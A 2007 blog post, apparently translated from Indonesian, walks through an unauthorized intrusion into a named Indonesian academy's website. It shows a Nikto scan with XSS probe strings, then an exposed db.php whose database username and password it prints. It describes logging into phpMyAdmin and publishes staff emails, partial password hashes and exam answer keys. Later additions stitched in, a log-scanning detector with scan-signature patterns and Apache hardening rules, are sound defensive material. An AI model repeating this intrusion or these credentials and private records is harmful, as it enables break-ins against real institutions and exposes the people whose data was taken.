By cyberlog
Published: April 25, 2007
Akademi Bina Sarana Informatika is one of the largest academies in Indonesia, with campuses spread across many regions. They use an online system for everything to simplify their education system: lecturer attendance, printing of study result cards, students' payment status and the complete records of tens of thousands of students can all be viewed on this web site. Here the author tries to analyse the online system deployed at www.bsi.ac.id by scanning their server with Nikto.pl

=============================================
Vulnerable : Db.php
Type : High Risk
Original Idea : Crew #sekuritionline@dalnet ( anonymous )
Site : http://www.bsi.ac.id
=============================================

OK, to save time let's start exploring the site www.bsi.ac.id !!!! The first thing to do is prepare a shell account, log in to your shell account, then download nikto.pl from the following URL: http://cirt.net/nikto/nikto-current.tar.gz. Here is the detailed walk through www.bsi.ac.id:

==============
login as: root
root@bla-bla-bla.com's password:
Last login: Mon 2006
Last login: Mon 01:09:20
welcome:~# wget http://cirt.net/nikto/nikto-current.tar.gz
--01:19:06-- http://cirt.net/nikto/nikto-current.tar.gz
=> `nikto-current.tar.gz'
Resolving cirt.net... done.
Connecting to cirt.net[209.197.238.96]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 192,642 [application/x-tar]
100%[======================================>] 192,642 184.98K/s ETA 00:00
01:19:08 (184.98 KB/s) - `nikto-current.tar.gz' saved [192642/192642]
welcome:~# tar -xvzf nikto-current.tar.gz
nikto-1.35/
nikto-1.35/config.txt
nikto-1.35/docs/
nikto-1.35/docs/CHANGES.txt
nikto-1.35/docs/LICENSE.txt
nikto-1.35/docs/nikto-1.34.man
nikto-1.35/docs/nikto_usage.html
nikto-1.35/docs/nikto_usage.txt
nikto-1.35/docs/README_plugins.txt
nikto-1.35/nikto.pl
nikto-1.35/plugins/
nikto-1.35/plugins/LW.pm
nikto-1.35/plugins/nikto_apacheusers.plugin
nikto-1.35/plugins/nikto_core.plugin
nikto-1.35/plugins/nikto_headers.plugin
nikto-1.35/plugins/nikto_httpoptions.plugin
nikto-1.35/plugins/nikto_msgs.plugin
nikto-1.35/plugins/nikto_mutate.plugin
nikto-1.35/plugins/nikto_outdated.plugin
nikto-1.35/plugins/nikto_passfiles.plugin
nikto-1.35/plugins/nikto_plugin_order.txt
nikto-1.35/plugins/nikto_realms.plugin
nikto-1.35/plugins/nikto_robots.plugin
nikto-1.35/plugins/nikto_user_enum_apache.plugin
nikto-1.35/plugins/nikto_user_enum_cgiwrap.plugin
nikto-1.35/plugins/outdated.db
nikto-1.35/plugins/realms.db
nikto-1.35/plugins/scan_database.db
nikto-1.35/plugins/server_msgs.db
nikto-1.35/plugins/servers.db
nikto-1.35/versions.txt
welcome:~# cd /root/nikto-1.35
welcome:~/nikto-1.35# ./nikto.pl -update
+ Retrieving 'realms.db'
+ Retrieving 'server_msgs.db'
+ Retrieving 'nikto_headers.plugin'
+ Retrieving 'nikto_outdated.plugin'
+ Retrieving 'servers.db'
+ Retrieving 'scan_database.db'
+ Retrieving 'nikto_core.plugin'
+ Retrieving 'outdated.db'
+ Retrieving 'CHANGES.txt'
+ www.cirt.net message: Version 2.0 is still coming... Seriously.
================================================
Then run your beloved nikto
==================================================
welcome:~/nikto-1.35# ./nikto.pl -h www.bsi.ac.id
---------------------------------------------------------------------------
- Nikto 1.35/1.36 - www.cirt.net
+ Target IP: 203.130.232.140
+ Target Hostname: www.bsi.ac.id
+ Target Port: 80
+ Start Time: Tue Dec 19 05:54:01 2006
---------------------------------------------------------------------------
- Scan is dependent on "Server" string which can be faked, use -g to override
+ Server: Apache 3 - POWERNET
- Retrieved X-Powered-By header: PHP/4.3.9
+ PHP/4.3.9 appears to be outdated (current is at least 5.1.4)
+ /~root - Enumeration of users is possible by requesting ~username (responds with Forbidden for real users, not found for non-existent users) (GET)
+ /icons/ - Directory indexing is enabled, it should only be enabled for specific directories (if required). If indexing is not used, the /icons directory should be removed. (GET)
+ /manual/images/ - Apache 2.0 directory indexing is enabled, it should only be enabled for specific directories (if required). Apache's manual should be removed and directory indexing disabled. (GET)
+ / - TRACE option appears to allow XSS or credential theft. See http://www.cgisecurity.com/whitehat-mirror/WhitePaper_screen.pdf for details (TRACE)
+ /admin.php?en_log_id=0&action=config - Needs Auth: (realm "BSI Admin, Authenticate Please"
+ /admin.php?en_log_id=0&action=users - Needs Auth: (realm "BSI Admin, Authenticate Please"
+ /config.php - Redirects to index.php , PHP Config file may contain database IDs and passwords.
+ /index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000 - PHP reveals potentially sensitive information via certain HTTP requests which contain specific QUERY strings. OSVDB-12184. (GET)
+ /index.php?=PHPE9568F34-D428-11d2-A769-00AA001ACF42 - PHP reveals potentially sensitive information via certain HTTP requests which contain specific QUERY strings. OSVDB-12184. (GET)
+ /index.php?=PHPE9568F35-D428-11d2-A769-00AA001ACF42 - PHP reveals potentially sensitive information via certain HTTP requests which contain specific QUERY strings. OSVDB-12184. (GET)
+ /index.php?=PHPE9568F36-D428-11d2-A769-00AA001ACF42 - PHP reveals potentially sensitive information via certain HTTP requests which contain specific QUERY strings. OSVDB-12184. (GET)
+ /index.php?module=My_eGallery - My_eGallery prior to 3.1.1.g are vulnerable to a remote execution bug via SQL command injection. (GET)
+ /index.php?top_message=<script>alert(document.cookie)</script> - Led-Forums allows any user to change the welcome message, and it is vulnerable to Cross Site Scripting (XSS). CA-2000-02. (GET)
+ /info.php - Contains PHP configuration information (GET)
+ /manual/ - Web server manual? tsk tsk. (GET)
+ /readme.txt - Default file found. (GET)
+ /\"><img%20src=\"javascript:alert(document.domain)\"> - The IBM Web Traffic Express Caching Proxy is vulnerable to Cross Site Scripting (XSS). CA-2000-02. (GET)
+ /admin.php - Needs Auth: (realm "BSI Admin, Authenticate Please"
+ /css - Redirects to http://www.bsi.ac.id/css/ , This might be interesting...
+ /db/ - This might be interesting... (GET)
+ /download/ - This might be interesting... (GET)
+ /img/ - This may be interesting... (GET)
+ /includes/ - This might be interesting... (GET)
+ /pages/ - This might be interesting... (GET)
+ /php/ - This might be interesting... (GET)
+ /phpmyadmin/ - This might be interesting... (GET)
+ /sql/ - This might be interesting... (GET)
+ Over 20 "OK" messages, this may be a by-product of the
+ server answering all requests with a "200 OK" message. You should
+ manually verify your results.
+ /db.php - This might be interesting... has been seen in web logs from an unknown scanner. (GET)
+ /index.php?base=test%20 - This might be interesting... has been seen in web logs from an unknown scanner. (GET)
+ /index.php?IDAdmin=test - This might be interesting... has been seen in web logs from an unknown scanner. (GET)
+ /index.php?pymembs=admin - This might be interesting... has been seen in web logs from an unknown scanner. (GET)
+ /index.php?SqlQuery=test%20 - This might be interesting... has been seen in web logs from an unknown scanner. (GET)
+ /index.php?tampon=test%20 - This might be interesting... has been seen in web logs from an unknown scanner. (GET)
+ /index.php?topic=<script>alert(document.cookie)</script>%20 - This might be interesting... has been seen in web logs from an unknown scanner. (GET)
+ /modules/Search/index.php - This might be interesting... has been seen in web logs from an unknown scanner. (GET)
+ Over 20 "OK" messages, this may be a by-product of the
+ server answering all requests with a "200 OK" message. You should
+ manually verify your results.
+ 2673 items checked - 30 item(s) found on remote host(s)
+ End Time: Tue Dec 19 06:44:55 2006 (3054 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
welcome:~/nikto-1.35#
============================================================
Now our job is to try the vulnerabilities on www.bsi.ac.id one by one
============================================================
hehehe, so many vulnerabilities, OK, the first one we check is www.bsi.ac.id/db.php
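A scan like the one above is loud on the server side: 2673 requests in about 50 minutes, several of them with signatures that never occur in normal traffic (the PHP easter-egg query strings, /db.php, /phpmyadmin/, /~root, a TRACE request, a script tag in a query string). The following Python script is an added example, not part of the original post, showing how an administrator would pick such a scan out of an Apache combined-format access log. The log lines in SAMPLE_LOG are constructed for the example, including the user-agent string, and the thresholds are assumptions.

```python
"""Spot a Nikto-style web scan in Apache access logs.

Added example, not part of the original post. It looks for the request
patterns the scan output above shows Nikto sending (the PHP easter-egg
query strings, /db.php and /config.php, /phpmyadmin/, /~root, TRACE,
<script> in a query string) and for a burst of requests from one client.
The lines in SAMPLE_LOG are constructed, including the user agent.
"""
import re
from collections import defaultdict
from datetime import datetime

# Apache "combined" format: ip ident user [time] "METHOD path HTTP/x" status size "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)"$'
)

# (indicator name, predicate on a parsed record); every pattern appears in the scan above
INDICATORS = [
    ("php_easter_egg", lambda r: "?=PHP" in r["path"]),
    ("config_file_probe", lambda r: r["path"].split("?", 1)[0] in {"/db.php", "/config.php", "/info.php"}),
    ("phpmyadmin_probe", lambda r: r["path"].lower().startswith("/phpmyadmin")),
    ("user_enum", lambda r: r["path"].startswith("/~")),
    ("trace_method", lambda r: r["method"] == "TRACE"),
    ("script_in_query", lambda r: "<script>" in r["path"].lower() or "%3cscript%3e" in r["path"].lower()),
    ("scanner_ua", lambda r: "nikto" in r["ua"].lower()),
]


def parse_line(line):
    """Parse one combined-format line; return None for lines that do not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return rec


def analyse(lines, burst_requests=10, burst_seconds=300):
    """Group requests by client IP and return, per IP:
    requests, indicators {name: count}, probe_burst, suspicious.
    probe_burst: more than burst_requests requests inside burst_seconds.
    suspicious: a burst, or at least two different indicator types.
    The thresholds are assumptions for the example, not tuned values."""
    per_ip = defaultdict(lambda: {"indicators": defaultdict(int), "times": []})
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        entry = per_ip[rec["ip"]]
        entry["times"].append(rec["ts"])
        for name, hit in INDICATORS:
            if hit(rec):
                entry["indicators"][name] += 1
    report = {}
    for ip, entry in per_ip.items():
        times = sorted(entry["times"])
        burst = any(
            (times[i + burst_requests] - times[i]).total_seconds() <= burst_seconds
            for i in range(len(times) - burst_requests)
        )
        report[ip] = {
            "requests": len(times),
            "indicators": dict(entry["indicators"]),
            "probe_burst": burst,
            "suspicious": burst or len(entry["indicators"]) >= 2,
        }
    return report


# Constructed sample: one scanning client (10.0.0.5) and one ordinary visitor (192.0.2.10).
SAMPLE_LOG = """\
10.0.0.5 - - [19/Dec/2006:05:54:01 +0700] "GET / HTTP/1.1" 200 5123 "-" "Mozilla/4.75 (Nikto/1.35)"
10.0.0.5 - - [19/Dec/2006:05:54:02 +0700] "GET /~root HTTP/1.1" 403 311 "-" "Mozilla/4.75 (Nikto/1.35)"
10.0.0.5 - - [19/Dec/2006:05:54:03 +0700] "TRACE / HTTP/1.1" 200 210 "-" "Mozilla/4.75 (Nikto/1.35)"
10.0.0.5 - - [19/Dec/2006:05:54:04 +0700] "GET /index.php?=PHPE9568F34-D428-11d2-A769-00AA001ACF42 HTTP/1.1" 200 2020 "-" "Mozilla/4.75 (Nikto/1.35)"
10.0.0.5 - - [19/Dec/2006:05:54:05 +0700] "GET /db.php HTTP/1.1" 200 140 "-" "Mozilla/4.75 (Nikto/1.35)"
10.0.0.5 - - [19/Dec/2006:05:54:06 +0700] "GET /phpmyadmin/ HTTP/1.1" 200 1800 "-" "Mozilla/4.75 (Nikto/1.35)"
10.0.0.5 - - [19/Dec/2006:05:54:07 +0700] "GET /index.php?topic=%3Cscript%3Ealert(document.cookie)%3C/script%3E HTTP/1.1" 200 2020 "-" "Mozilla/4.75 (Nikto/1.35)"
192.0.2.10 - - [19/Dec/2006:05:55:00 +0700] "GET /index.php HTTP/1.1" 200 5123 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1)"
192.0.2.10 - - [19/Dec/2006:05:55:01 +0700] "GET /img/logo.gif HTTP/1.1" 200 3310 "http://www.bsi.ac.id/index.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1)"
"""


def sample_report():
    return analyse(SAMPLE_LOG.splitlines())


if __name__ == "__main__":
    for ip, info in sample_report().items():
        flag = "SUSPICIOUS" if info["suspicious"] else "ok"
        print(f"{ip:15} {info['requests']:4d} req  {flag:10} {info['indicators']}")
```

The user-agent check is the weakest indicator, since a scanner can send any string it likes (Nikto itself warns above that the "Server" header it relies on can be faked), which is why the verdict needs two different indicator types or a request burst rather than a single match. Against a real log, feed the file's lines to analyse() instead of SAMPLE_LOG.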
[Figure: the BSI database login and password]

Waw !!! I don't believe it ??? It turns out the database login and password are plainly visible:

ST", "localhost" ; define("USER", "1385" ; define("PASS", "101101" ; define("DB", "db1385n1" ; ?>

OK, time to get into the database of one of the largest academies in Indonesia, let's go to the party :)

www.bsi.ac.id/phpmyadmin
user : 1385
pass : 101101

[Figure: start page of the BSI database]

waw, it turns out we can get inside as well and look around at the important data of this academy (imagine if irresponsible people, or people who want to profit from this weakness, got in there ??? it's unimaginable how much data could be stolen). The user table (columns as they appear in the dump: user name, display name, site, e-mail, password hash):

budiprasetyo   God                 http://bsi.ac.id   budi_prasetyo@bsi.ac.id     2ca41752ccf4dbdb76d8fe88c48xxxxx [ md5 hash ]
bimosadewo     bimosadewo          www.bsi.ac.id      budi_prasetyo@indo.net.id   2ca41752ccf4dbdb76d8fe88c48xxxxx [ md5 hash ]
webmaster      Web Master BSI      www.bsi.ac.id      admin@bsi.ac.id             237efd9bbf866189be3a3055515xxxxx [ md5 hash ]
webadmin       Web Administrator   www.bsi.ac.id      webmaseter@bsi.ac.id        237efd9bbf866189be3a3055515xxxxx [ md5 hash ]

and it turns out the exam answer keys are in there too:

kd_ujn   jml_soal   nilai_soal   knc_jwb
1021     25         4.00         DDAEDCBBACBCBABCAABBCDCAD
1022     25         4.00         DBCBBBBABADDDCABAACDCBDCD
1023     25         4.00         BBADBBDCDAACBBBCDBBBBDBBC
1024     25         4.00         DDAEDCBBACDDDCABAACDBDBBC
1025     25         4.00         DBCBCDCCCBBCBBBBCADDDCAAD
1026     25         4.00         CDDADBDDBBBCCCCCADACDCCCB
1041     30         3.33         BCBBBDAAAAABCDCABDDCCBACBBABDB
1042     30         3.33         CBCADCCCCABACCBCDCAADCCADABABB
1043     30         3.33         DDCCAACCAACACACBBCBCBACADCBABB
1044     30         3.33         BCADBDBAABAABBBDBBDADBDDCBBBAD
1045     30         3.33         DDCCAACCAAABCDCABDDCDBDDCBBBAD
1046     30         3.33         CBCADCCCCAAABBCDBBDABACADCBABB

Note :
- Admins, please pay closer attention to the security of the server, and
- For now the bug at the URL www.bsi.ac.id/phpmyadmin has been successfully closed by the admin by not allowing any IP in other than the admin's own IP
- We only penetrated inside, we did not damage or take your data; if someone takes or adds to the database on your server, it was not us who did it.
- As of the time of writing, the file named db.php can still be accessed by the general public (admins, please check the permissions on that file)

thanks to : Allah SWT & Nabi Muhammad SAW, My Family, Thebig`s Family #sekuritionline@dalnet, Jasakom Community and all Crew www.sekuritionline.com
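The notes above describe two fixes: phpmyadmin closed to every address except the admin's own, and the permissions on db.php still to be dealt with. As an added example, not the BSI server's configuration and not taken from the post, here is what those two fixes plus the other items Nikto reported (directory indexing, the served Apache manual, TRACE) look like in Apache 2.0/2.2-style directives. The document-root path and <ADMIN-IP> are placeholders; TraceEnable exists from Apache 2.0.55 and 2.2 onwards.

```apache
# Added example; placeholders, not the BSI server's real configuration.

# db.php exists only to be include()d by other scripts; Apache must never
# serve it directly, so the define("USER"...)/define("PASS"...) text can't leak.
# (Better still, keep the credentials in a file outside the document root
#  and have db.php do no more than: require '/etc/myapp/db-credentials.php';)
<Files "db.php">
    Order Deny,Allow
    Deny from all
</Files>

# phpMyAdmin reachable only from the administrator's address (the fix the
# admin applied). <ADMIN-IP> is a placeholder for that address.
<Directory "/var/www/html/phpmyadmin">
    Order Deny,Allow
    Deny from all
    Allow from <ADMIN-IP>
</Directory>

# No directory listings anywhere under the document root
# (Nikto listed /icons/, /manual/images/, /db/, /sql/, /includes/ ...).
<Directory "/var/www/html">
    Options -Indexes
    AllowOverride None
</Directory>

# The bundled Apache manual has no business on a production host.
<Location "/manual">
    Order Deny,Allow
    Deny from all
</Location>

# TRACE was flagged as a cross-site tracing risk; it is not needed in production.
TraceEnable off
```

Two of the findings are outside httpd.conf: the X-Powered-By: PHP/4.3.9 header and the ?=PHPE9568F34... responses come from the PHP interpreter and are switched off with expose_php = Off in php.ini, and /info.php (a phpinfo() page) should simply be deleted. After changing the configuration, re-running the same Nikto scan against your own host is the quickest way to confirm the items have gone.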